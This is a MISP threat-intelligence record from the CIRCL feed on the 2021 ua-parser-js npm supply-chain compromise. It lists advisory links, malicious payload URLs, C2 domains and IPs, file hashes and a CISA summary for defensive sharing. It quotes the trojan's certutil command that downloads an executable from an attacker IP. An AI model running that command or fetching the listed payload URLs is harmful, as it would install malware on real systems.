misp-circl-feed/feeds/circl/misp/ad7665ec-fef2-44eb-a019-b1b25a8aec05.json

562 lines
20 KiB
JSON
Raw Normal View History

2023-04-21 13:25:09 +00:00
{
"Event": {
"analysis": "2",
"date": "2021-10-24",
"extends_uuid": "",
"info": "Malware Discovered in Popular NPM Package, ua-parser-js",
"publish_timestamp": "1635064007",
"published": true,
"threat_level_id": "2",
"timestamp": "1635063955",
"uuid": "ad7665ec-fef2-44eb-a019-b1b25a8aec05",
"Orgc": {
"name": "CIRCL",
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
},
"Tag": [
{
"colour": "#004646",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "type:OSINT",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#0071c3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "osint:lifetime=\"perpetual\"",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#0087e8",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "osint:certainty=\"50\"",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#ffffff",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "tlp:white",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#053a00",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "misp-galaxy:mitre-attack-pattern=\"Compromise Software Supply Chain - T1195.002\"",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#0088cc",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "misp-galaxy:mitre-attack-pattern=\"Compromise Software Dependencies and Development Tools - T1195.001\"",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
],
"Attribute": [
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1635061972",
"to_ids": false,
"type": "link",
"uuid": "e9d82a66-46bd-4f0e-aeac-17349abddeb0",
"value": "https://github.com/advisories/GHSA-pjwm-rvh2-c87w"
},
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1635062091",
"to_ids": false,
"type": "link",
"uuid": "508a294c-876e-4a8a-a3bd-a3de15e10325",
"value": "https://github.com/faisalman/ua-parser-js/issues/536"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1635062310",
"to_ids": false,
"type": "url",
"uuid": "f51805cb-5fec-4ce1-b7ae-1d1206720542",
"value": "http://159.148.186.228/download/jsextension.exe"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1635062343",
"to_ids": true,
"type": "url",
"uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83",
"value": "https://citationsherbe.at/sdd.dll"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1635062385",
"to_ids": true,
"type": "domain",
"uuid": "3e4cc221-dbb9-4e64-9523-800d8af8f972",
"value": "citationsherbe.at"
},
{
"category": "Artifacts dropped",
"comment": "sdd.dll",
"deleted": false,
"disable_correlation": false,
"timestamp": "1635062444",
"to_ids": true,
"type": "sha256",
"uuid": "1b1a28a9-2b47-43a3-92b9-c9353497f429",
"value": "2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd"
},
{
"category": "Artifacts dropped",
"comment": "jsextension.exe",
"deleted": false,
"disable_correlation": false,
"timestamp": "1635062474",
"to_ids": true,
"type": "sha256",
"uuid": "9163b990-5b87-413c-a8e7-f616b908157f",
"value": "47dded0efc230c3536f4db1e2e476afd3eda8d8ea0537db69d432322cdbac9ca"
}
],
"Object": [
{
"comment": "",
"deleted": false,
"description": "Metadata used to generate an executive level report",
"meta-category": "misc",
"name": "report",
"template_uuid": "70a68471-df22-4e3f-aa1a-5a3be19f82df",
"template_version": "4",
"timestamp": "1635063955",
"uuid": "30866961-7eda-4bb7-a5e8-cb0bfeebce4c",
"ObjectReference": [
{
"comment": "",
"object_uuid": "30866961-7eda-4bb7-a5e8-cb0bfeebce4c",
"referenced_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
"relationship_type": "alerts",
"timestamp": "1635063955",
"uuid": "892ba669-5323-41f2-b7bf-9093d813aea2"
}
],
"Attribute": [
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "link",
"timestamp": "1635061938",
"to_ids": false,
"type": "link",
"uuid": "10d9ac50-3208-4cff-9d07-c2bec1c192c8",
"value": "https://us-cert.cisa.gov/ncas/current-activity/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "summary",
"timestamp": "1635061938",
"to_ids": false,
"type": "text",
"uuid": "5faebe54-7492-4f23-99f8-edf5e24e5424",
"value": "Versions of a popular NPM package named ua-parser-js was found to contain malicious code. ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. A computer or device with the affected software installed or running could allow a remote attacker to obtain sensitive information or take control of the system. \r\n\r\nCISA urges users and administers using compromised ua-parser-js versions 0.7.29, 0.8.0, and 1.0.0 to update to the respective patched versions: 0.7.30, 0.8.1, 1.0.1 \r\n\r\nFor more information, see Embedded malware in ua-parser-js."
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "type",
"timestamp": "1635061938",
"to_ids": false,
"type": "text",
"uuid": "0e1e4035-31a1-4df6-8aa9-2a6208f7f601",
"value": "Alert"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Command line and option related to a software malicious or not to execute specific commands.",
"meta-category": "misc",
"name": "command-line",
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
"template_version": "1",
"timestamp": "1635063837",
"uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
"ObjectReference": [
{
"comment": "",
"object_uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
"referenced_uuid": "e1f2c049-da88-4238-9dde-4134209c1364",
"relationship_type": "is-in-relation-with",
"timestamp": "1635062957",
"uuid": "97af4dfa-5d0a-47c5-ba72-e00f65c25482"
},
{
"comment": "",
"object_uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
"referenced_uuid": "f51805cb-5fec-4ce1-b7ae-1d1206720542",
"relationship_type": "downloads",
"timestamp": "1635063003",
"uuid": "e205642b-21b0-4daa-a28f-275219dba1ba"
},
{
"comment": "",
"object_uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
"referenced_uuid": "9163b990-5b87-413c-a8e7-f616b908157f",
"relationship_type": "related-to",
"timestamp": "1635063837",
"uuid": "d3629ef3-282a-4527-813e-ec8fa5be906d"
}
],
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "value",
"timestamp": "1635062024",
"to_ids": false,
"type": "text",
"uuid": "974258e7-2e79-413c-9be8-08698653b87b",
"value": "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "description",
"timestamp": "1635062024",
"to_ids": false,
"type": "text",
"uuid": "e3df3b20-a215-40d4-ae1a-a9ed768de240",
"value": "The trojan try to execute in the cmd"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Command line and option related to a software malicious or not to execute specific commands.",
"meta-category": "misc",
"name": "command-line",
"template_uuid": "88ebe222-d3cc-11e9-875d-7f13f460adaf",
"template_version": "1",
"timestamp": "1635063109",
"uuid": "57d3ed7e-eda9-4e5e-b7ac-a813415e9006",
"ObjectReference": [
{
"comment": "Checking the date range of vulnerable packages",
"object_uuid": "57d3ed7e-eda9-4e5e-b7ac-a813415e9006",
"referenced_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
"relationship_type": "identifies",
"timestamp": "1635063109",
"uuid": "7b9af0b8-1e55-4ac8-ad04-5b96b576fc98"
}
],
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "value",
"timestamp": "1635062225",
"to_ids": false,
"type": "text",
"uuid": "4834122d-b43b-4b8d-a9d1-3085611ebaec",
"value": "npm show ua-parser-js time",
"Tag": [
{
"colour": "#0fbf00",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "cycat:scope=\"detection\"",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "description",
"timestamp": "1635062193",
"to_ids": false,
"type": "text",
"uuid": "542061ee-8993-44ef-8261-f27f25dc9067",
"value": "To check the time when the package was installed"
}
]
},
{
"comment": "",
"deleted": false,
"description": "A domain/hostname and IP address seen as a tuple in a specific time frame.",
"meta-category": "network",
"name": "domain-ip",
"template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734",
"template_version": "10",
"timestamp": "1635063682",
"uuid": "116cfff2-f422-4b59-a5aa-630fc443be4b",
"ObjectReference": [
{
"comment": "",
"object_uuid": "116cfff2-f422-4b59-a5aa-630fc443be4b",
"referenced_uuid": "3e4cc221-dbb9-4e64-9523-800d8af8f972",
"relationship_type": "is-in-relation-with",
"timestamp": "1635063351",
"uuid": "83bd1f6f-8d62-4da9-a6d5-4f74d5ea48e1"
},
{
"comment": "",
"object_uuid": "116cfff2-f422-4b59-a5aa-630fc443be4b",
"referenced_uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83",
"relationship_type": "related-to",
"timestamp": "1635063682",
"uuid": "177395ef-d715-4122-97ca-be60b7b975fb"
}
],
"Attribute": [
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "domain",
"timestamp": "1635062540",
"to_ids": true,
"type": "domain",
"uuid": "75318d44-9526-43f4-9f8c-c24edf26a83f",
"value": "citationsherbe.at"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ip",
"timestamp": "1635062540",
"to_ids": true,
"type": "ip-dst",
"uuid": "dc052f3a-24fa-4595-8deb-6efb68b59d64",
"value": "95.213.165.20"
}
]
},
{
"comment": "",
"deleted": false,
"description": "A domain/hostname and IP address seen as a tuple in a specific time frame.",
"meta-category": "network",
"name": "domain-ip",
"template_uuid": "43b3b146-77eb-4931-b4cc-b66c60f28734",
"template_version": "10",
"timestamp": "1635062582",
"uuid": "e1f2c049-da88-4238-9dde-4134209c1364",
"Attribute": [
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "ip",
"timestamp": "1635062582",
"to_ids": true,
"type": "ip-dst",
"uuid": "2c40cba0-709f-42e0-8f09-9373862a40ac",
"value": "159.148.186.228"
}
]
},
{
"comment": "Vulnerable npm package UAParser.js - '0.7.29': '2021-10-22T12:15:21.378Z',\r\n'0.7.30': '2021-10-22T16:16:08.807Z',\r\n\r\n'0.8.0': '2021-10-22T12:16:06.877Z',\r\n'0.8.1': '2021-10-22T16:23:53.062Z',\r\n\r\n'1.0.0': '2021-10-22T12:16:19.726Z',\r\n'1.0.1': '2021-10-22T16:26:19.004Z',\r\n",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "24",
"timestamp": "1635063704",
"uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
"ObjectReference": [
{
"comment": "",
"object_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
"referenced_uuid": "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e",
"relationship_type": "executes",
"timestamp": "1635062818",
"uuid": "73a1835e-a0dc-40f2-a86a-172af4025954"
},
{
"comment": "",
"object_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
"referenced_uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83",
"relationship_type": "downloads",
"timestamp": "1635063384",
"uuid": "9f095fe7-ced7-4685-942b-5cbfa35b32c4"
},
{
"comment": "",
"object_uuid": "3f6f1f5f-b847-4fd1-be30-6f43601c26cd",
"referenced_uuid": "508a294c-876e-4a8a-a3bd-a3de15e10325",
"relationship_type": "describes",
"timestamp": "1635063704",
"uuid": "2a6e821d-81d7-45a6-b420-f8929fc38035"
}
],
"Attribute": [
{
"category": "Payload installation",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "pattern-in-file",
"timestamp": "1635062757",
"to_ids": true,
"type": "pattern-in-file",
"uuid": "fbc77d66-169a-48bb-82c5-7ce5c847e205",
"value": "ua-parser-js"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "24",
"timestamp": "1635063451",
"uuid": "bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b",
"ObjectReference": [
{
"comment": "",
"object_uuid": "bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b",
"referenced_uuid": "a9b50a3c-793f-4541-a123-60716668e2d5",
"relationship_type": "analysed-with",
"timestamp": "1635063452",
"uuid": "e0b56508-2235-4dd3-ad3f-ebf948afa2bf"
}
],
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "sdd.dll",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1635062444",
"to_ids": true,
"type": "md5",
"uuid": "1b724674-e8c6-4deb-a32b-b6cf86b591a6",
"value": "de8b54a938ac18f15cad804d79a0e19d"
},
{
"category": "Artifacts dropped",
"comment": "sdd.dll",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1635062444",
"to_ids": true,
"type": "sha1",
"uuid": "88ee0d56-6d8a-4869-9443-1dbe333121c2",
"value": "b6004c62e2d9dbad9cfd5f7e18647ac983788766"
},
{
"category": "Artifacts dropped",
"comment": "sdd.dll",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1635062444",
"to_ids": true,
"type": "sha256",
"uuid": "22a01316-f9ba-4889-9d29-eaf021bb104b",
"value": "2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd"
}
]
},
{
"comment": "",
"deleted": false,
"description": "VirusTotal report",
"meta-category": "misc",
"name": "virustotal-report",
"template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
"template_version": "4",
"timestamp": "1635063777",
"uuid": "a9b50a3c-793f-4541-a123-60716668e2d5",
"ObjectReference": [
{
"comment": "",
"object_uuid": "a9b50a3c-793f-4541-a123-60716668e2d5",
"referenced_uuid": "b6541760-d7e6-432b-9715-eae2ce06ad83",
"relationship_type": "related-to",
"timestamp": "1635063777",
"uuid": "3055c698-4f96-41d1-819b-26520b4b5eea"
}
],
"Attribute": [
{
"category": "Other",
"comment": "sdd.dll",
"deleted": false,
"disable_correlation": true,
"object_relation": "last-submission",
"timestamp": "1635062444",
"to_ids": false,
"type": "datetime",
"uuid": "a38e6a9c-1573-4b68-b9ee-dfdda8eb57ed",
"value": "2021-10-24T04:03:55+00:00"
},
{
"category": "External analysis",
"comment": "sdd.dll",
"deleted": false,
"disable_correlation": true,
"object_relation": "permalink",
"timestamp": "1635062444",
"to_ids": false,
"type": "link",
"uuid": "37fe948f-89f7-4316-bdf3-c88fdbd16b11",
"value": "https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/detection/f-2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd-1635048235"
},
{
"category": "Artifacts dropped",
"comment": "sdd.dll",
"deleted": false,
"disable_correlation": true,
"object_relation": "detection-ratio",
"timestamp": "1635062444",
"to_ids": false,
"type": "text",
"uuid": "b36b2447-2d9b-4993-b23b-2ff46ad63d7c",
"value": "23/50"
}
]
}
]
}
}